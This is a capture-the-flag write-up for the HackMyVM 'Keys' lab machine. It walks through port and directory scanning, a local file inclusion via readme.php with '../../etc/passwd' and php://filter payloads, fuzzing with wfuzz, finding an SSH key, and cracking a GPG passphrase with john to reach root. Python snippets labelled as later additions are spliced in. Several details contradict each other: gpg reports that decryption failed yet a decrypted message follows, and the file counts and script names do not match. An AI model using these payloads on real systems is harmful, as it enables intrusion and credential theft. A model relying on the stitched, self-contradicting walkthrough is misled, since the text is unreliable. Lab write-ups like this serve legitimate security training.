HackMyVM - Keys - Writeup

Note

Big thank you to avijneyam for creating a nice challenge machine!

I have obfuscated some of the results below so as not to spoil it too much, as it is a really nice VM
(typically with ****** or, if it is in a file path, xxxxx!).

Feel free to comment and tell me what I missed and got wrong or post your own writeup so myself and others can improve their skills too.

Identify the target

┌──(kali㉿kali)-[~/keys]
└─$ nmap -sP 10.0.0.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-02 18:26 EDT
Nmap scan report for 10.0.0.10
Host is up (0.000097s latency).
Nmap scan report for 10.0.0.20
Host is up (0.00053s latency).
Nmap done: 2 IP addresses (2 hosts up) scanned in 0.20 seconds


The target is 10.0.0.20.
I am attacking from a mostly vanilla Kali under VirtualBox at 10.0.0.10.

Scan for ports


└─$ nmap -T4 -p- -sC -sV -oN nmap.log 10.0.0.20
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-02 18:32 EDT
Nmap scan report for 10.0.0.20
Host is up (0.00067s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 6e:b1:d1:09:f5:dc:01:29:ed:9d:4f:8e:a7:7a:a0:a6 (RSA)
|   256 35:f4:29:df:64:6a:be:7f:9f:0a:9f:ee:07:e4:19:07 (ECDSA)
|_  256 4e:0f:f7:32:cc:c7:91:57:07:d9:50:0a:38:c9:e5:11 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: The World of Keys
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan the webservice

└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -r -u http://10.0.0.20 -x html,php,txt,jpg -o dir-medium.txt --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.0.20
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,jpg,html,php
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2021/11/02 18:44:47 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 135]
/readme.php           (Status: 200) [Size: 398]



Fetch /readme.php

└─$ curl http://10.0.0.20/readme.php

The page contains:

<!-- Here is a Gift for you Ayr43KwSdwpWQw6HFce8SaMmpWH12XsUF -->

Using https://www.dcode.fr/base-58-cipher this decodes to "my_personal_wordlist.txt",
which gives us the URL of a custom wordlist.
Scanning for other files returns no results, so let's use that wordlist to check for query string parameters on the readme.php page.

└─$ wfuzz -c -z file,my_personal_wordlist.txt --hh BBB  http://10.0.0.20/readme.php?FUZZ{test}=../../../../../etc/passwd
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.0.0.20/readme.php?FUZZ=../../../../../etc/passwd
Total requests: 99900

=====================================================================
ID           Response   Lines    Word       Chars       Payload        
=====================================================================

000000001:   200        24 L     45 W       398 Ch      "test"         
000084829:   200        54 L     89 W       2004 Ch     "***y"         

Total time: 0
Processed Requests: 99901
Filtered Requests: 99899


Having a look around the file system, /etc/passwd identifies the user accounts:

root:x:0:0:root:/root:/bin/bash
steve:x:1000:1000:steve,,,:/home/steve:/bin/bash
jack:x:1001:1001::/home/jack:/bin/bash
rachel:x:1002:1002::/home/rachel:/bin/bash
useless:x:1003:1003::/home/useless:/bin/bash


Next I read the readme.php source to see what it does with the parameter and how to better exploit it
(it had to be base64 encoded through the php://filter wrapper, because including readme.php from itself would recurse):

└─$ curl http://10.0.0.20/readme.php?***y=php://filter/convert.base64-encode/resource=readme.php


Decoding the base64 gave an interesting comment in the code:
<?php
   include($_GET['34sy']);
   // The World of Keys are Here yCQlSq/+(Uq/+****
   // I Love Z85 (ZeroMQ) :)
   // one more gift for you :) id_rsa.zip
?>
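As an added defender-side example (not part of the original writeup), a small Python scanner over constructed nginx access-log lines that flags the two techniques used against readme.php above: directory traversal in a query value and the php:// filter wrapper. The log lines, timestamps and user agents are made up; only the parameter name and payload shapes come from the writeup.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed nginx access-log lines (combined format): one benign request and three
# that mirror the writeup's LFI probes. These are sample inputs, not logs from the machine.
SAMPLE_LOG = """\
10.0.0.10 - - [02/Nov/2021:18:50:01 -0400] "GET /readme.php HTTP/1.1" 200 398 "-" "curl/7.74.0"
10.0.0.10 - - [02/Nov/2021:18:51:12 -0400] "GET /readme.php?34sy=../../../../../etc/passwd HTTP/1.1" 200 2004 "-" "Wfuzz/3.1.0"
10.0.0.10 - - [02/Nov/2021:18:55:40 -0400] "GET /readme.php?34sy=php://filter/convert.base64-encode/resource=readme.php HTTP/1.1" 200 560 "-" "curl/7.74.0"
10.0.0.10 - - [02/Nov/2021:18:56:03 -0400] "GET /readme.php?34sy=..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0 "-" "curl/7.74.0"
"""

# Enough of the combined log format to pull out client IP, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')                 # "../" segments
WRAPPER = re.compile(r'^(php|file|data|expect|phar|zip)://', re.IGNORECASE)  # PHP stream wrappers


def classify_value(value):
    """Return an indicator name for one query value, or None if it looks harmless."""
    v = unquote(unquote(value))  # parse_qsl decoded once; decode again to catch double encoding
    if WRAPPER.search(v):
        return "php-wrapper"
    if TRAVERSAL.search(v):
        return "path-traversal"
    return None


def find_lfi_attempts(log_text):
    """Scan access-log text; return (ip, path, param, indicator) for every suspicious query value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than crash the scan
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                hits.append((m.group("ip"), parts.path, name, kind))
    return hits


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```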

https://cryptii.com/pipes/z85-encoder

yCQlSq/+(Uq/+**** decodes to k3ys********
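The two decodings above were done on web sites; as an added example (my own code, not from the writeup or the VM) here are both decoders in Python so they can be run offline. The Base58 gift string from readme.php is on the page and decodes to the wordlist name; the Z85 string is obfuscated in the writeup, so the Z85 decoder is checked against the ZeroMQ spec test vector "HelloWorld" instead.

```python
# Alphabets used by the two sites linked above: Bitcoin-style Base58 and ZeroMQ Z85.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
Z85_ALPHABET = ("0123456789abcdefghijklmnopqrstuvwxyz"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&<>()[]{}@%$#")


def base58_decode(text):
    """Decode Base58: treat the string as one big-endian base-58 number; leading '1's are zero bytes."""
    value = 0
    for ch in text:
        value = value * 58 + B58_ALPHABET.index(ch)  # ValueError on characters outside the alphabet
    raw = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + raw


def z85_decode(text):
    """Decode Z85: every 5 characters are one base-85 number holding a 32-bit big-endian word."""
    if len(text) % 5:
        raise ValueError("Z85 input length must be a multiple of 5")
    out = bytearray()
    for i in range(0, len(text), 5):
        word = 0
        for ch in text[i:i + 5]:
            word = word * 85 + Z85_ALPHABET.index(ch)
        if word > 0xFFFFFFFF:
            raise ValueError("Z85 group out of range")
        out += word.to_bytes(4, "big")
    return bytes(out)


# The Base58 "gift" from the HTML comment in readme.php.
GIFT_B58 = "Ayr43KwSdwpWQw6HFce8SaMmpWH12XsUF"


def decode_gift():
    """Return the wordlist file name hidden in the readme.php comment."""
    return base58_decode(GIFT_B58).decode("ascii")


if __name__ == "__main__":
    print(decode_gift())
    print(z85_decode("HelloWorld").hex())
```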


And we are also given another new file: id_rsa.zip
Downloading the zip file provides us with 32,768 private and public key pairs... :(


Fetching the new folder:

wget -r http://10.0.0.20/k3ys......

That gives us 9,999 files named id_rsa-nnnn.
I noticed that the first couple of files were identical, so I thought I would compare them all to find any that differ.


checkkeys.sh

#!/bin/sh
# Compare every file in the key folder against id_rsa-0001 and print the names of any that differ.
KEYS=k3ys......

echo Check Keys

for f in "$KEYS"/*; do
    if ! diff -q "$KEYS/id_rsa-0001" "$f"; then
        echo "${f##*/}"
    fi
done


└─$ sh ./checkkey.sh
Check Keys
Files k3ys....../id_rsa-0001 and k3ys....../id_rsa-***5 differ
id_rsa-***5



The difference was just a note saying I had found it, but I now have a 4 digit number, so that should point to the key to use from the zip file. (Yes, I have hidden the number!)
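The shell script above compares everything against id_rsa-0001, which only works if the first file is a decoy. As an added example (my own code, not from the writeup), here is the general form of the check in Python: hash every file, group by digest, and report whatever is not in the majority group, so it also works when the odd key happens to be the first file. The folder it runs on is constructed in a temporary directory, not the real k3ys folder.

```python
import hashlib
import os
import tempfile


def find_odd_files(folder):
    """Hash every regular file in folder, group by digest, return names outside the majority group."""
    groups = {}
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            digest = hashlib.sha256(fh.read()).hexdigest()
        groups.setdefault(digest, []).append(name)
    if not groups:
        return []
    majority = max(groups.values(), key=len)
    return sorted(n for names in groups.values() if names is not majority for n in names)


def build_demo_folder(count=20, odd_index=7):
    """Constructed stand-in for the k3ys folder: count identical decoys plus one file that differs."""
    folder = tempfile.mkdtemp(prefix="k3ys-demo-")
    decoy = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
             b"DECOY KEY BODY (constructed, not a real key)\n"
             b"-----END OPENSSH PRIVATE KEY-----\n")
    for i in range(1, count + 1):
        body = decoy + b"# you found it\n" if i == odd_index else decoy
        with open(os.path.join(folder, f"id_rsa-{i:04d}"), "wb") as fh:
            fh.write(body)
    return folder


if __name__ == "__main__":
    print(find_odd_files(build_demo_folder()))
```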


└─$ cp id_rsa/2048/private/*-XXX5 ./foundthekey



Using the usernames found earlier and a little trial and error, we get a user shell.


┌──(kali㉿kali)-[~/keys]
└─$ ssh steve@10.0.0.20 -i ./foundthekey
Linux keys 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
[ useless:user ] the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov  3 00:04:46 2021 from 10.0.0.10
steve@keys:~$ cat u__s__e__r.txt 
***************VDll6
steve@keys:~$ 


This time it was not me that obfuscated the user flag: only the last 5 characters are there, so root or some other access will be needed to get the full user key.


Root privilege escalation

I had a good look around and scanned with linpeas without finding much to help me, but there are some interesting files, including a python script in /opt that didn't appear to give me any extra information.
There is, however, an encrypted message in the home directory:

steve@keys:~$ cat .important_message.asc 
-----BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0

-----END PGP MESSAGE-----
steve@keys:~$


The user also has a GPG key in /var/mail/private_key.gpg, but it is secured with a passphrase.
After copying the file to Kali we can use john to find it.

└─$ gpg2john private_key.gpg > johnkey

└─$ john  --wordlist=/home/kali/rockyou.txt johnkey 

└─$ john --show  johnkey
root@keys.com:y******t:::root@keys.com::private_key.gpg

1 password hash cracked, 0 left



Now that we have the passphrase, we can import the key into steve's keyring on the target using the passphrase and then decrypt the message with it.

steve@keys:/var/mail$ gpg --import private_key.gpg 
gpg: key A075831A574B572D: "root@keys.com" not changed
gpg: key A075831A574B572D: secret key imported
gpg: Total number processed: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
steve@keys:~$ gpg --output important_message.txt --decrypt .important_message.asc 
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 2048-bit RSA key, ID A075831A574B572D, created 2021-10-28
      "root@keys.com"
gpg: WARNING: message was not integrity protected
gpg: Hint: If this message was created before the year 2003 it is
     likely that this message is legitimate.  This is because back
     then integrity protection was not widely used.
gpg: Use the option '--ignore-mdc-error' to decrypt anyway.
gpg: decryption forced to fail!
steve@keys:~$ cat important_message.txt 
Root Password is th3************3steve@keys:~$ 
steve@keys:~$ su
Password: 
root@keys:/home/steve# cd
root@keys:~# ls
ro0ot.txt
root@keys:~# 


The message gave us the root password, and with root it is a trivial task to fetch the other parts of the flag from the various user directories.

References

https://hackmyvm.eu/machines/machine.php?vm=Keys
https://cryptii.com/pipes/z85-encoder
https://www.dcode.fr/base-58-cipher
https://www.dcode.fr/code-base-64

